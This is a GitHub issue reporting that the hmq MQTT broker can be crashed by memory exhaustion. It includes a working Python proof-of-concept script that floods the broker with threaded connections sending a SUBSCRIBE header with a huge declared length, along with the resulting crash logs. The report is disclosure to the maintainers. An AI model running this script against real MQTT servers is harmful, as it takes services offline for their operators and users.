Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

The memory of hmq can be easily filled up, causing hmq excessive memory use and crashed. #177

Open
AAArdu opened this issue Dec 27, 2022 · 1 comment
Open

The memory of hmq can be easily filled up, causing hmq excessive memory use and crashed. #177

AAArdu opened this issue Dec 27, 2022 · 1 comment

Comments

@AAArdu
Copy link

AAArdu commented Dec 27, 2022

Description

Hi, I found the memory of hmq can be easily filled up with a simple MQTT message which has big length field. Sending such message to the server can easily make the server consume excessive memory use and make the server crash down (kill by system). It seems there is an issue in memory allocation and control. This may be a threaten and exploited by attackers to do the Dos attack.

A similar threaten can refer to CVE-2017-7651

Note that even unauthorized attackers can do this.

Environment

docker Ubuntu 20.04.3 LTS with 4GB RAM

hmq (github commit b2e79c3 on Jun 18)

go version go1.19

Attack simulation

run server

hmq --port 1883

run attack script

the attack script (in python) may seems like

import socket
import threading
import time

ip_address = "0.0.0.0"
port = 1883

payload = b"\x80\xff\xff\xff\x7f" # mqtt SUBSCRIBE type message

###[ MQTT fixed header ]### 
#   type      = SUBSCRIBE
#   DUP       = Disabled
#   QOS       = At most once delivery
#   RETAIN    = Disabled
#   len       = 268435455

def send_attack():
    soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    soc.connect((ip_address,port))

    soc.sendall(payload)
    soc.close()

while(True):
    for i in range(15):
        t = threading.Thread(target=send_attack)
        t.setDaemon(True)
        t.start()
    time.sleep(1)

Result

the server consumes excessive memory and killed by system.

...
{"level":"error","timestamp":"2022-12-27T13:30:01.462Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.466Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.469Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.472Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
{"level":"error","timestamp":"2022-12-27T13:30:01.475Z","logger":"broker","caller":"broker/broker.go:314","msg":"read connect packet error","error":"EOF"}
Killed
@AAArdu AAArdu changed the title The memory of hmq can be easily filled up, causing ftp-srv excessive memory use and crashed. The memory of hmq can be easily filled up, causing hmq excessive memory use and crashed. Jan 6, 2023
@xlango
Copy link

xlango commented Apr 15, 2024

A large number of messages are pushed to the topic, and if there is no consumer consumption for a long time, the memory usage of the broker keeps growing and messages keep piling up. How to solve this situation?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@AAArdu @xlango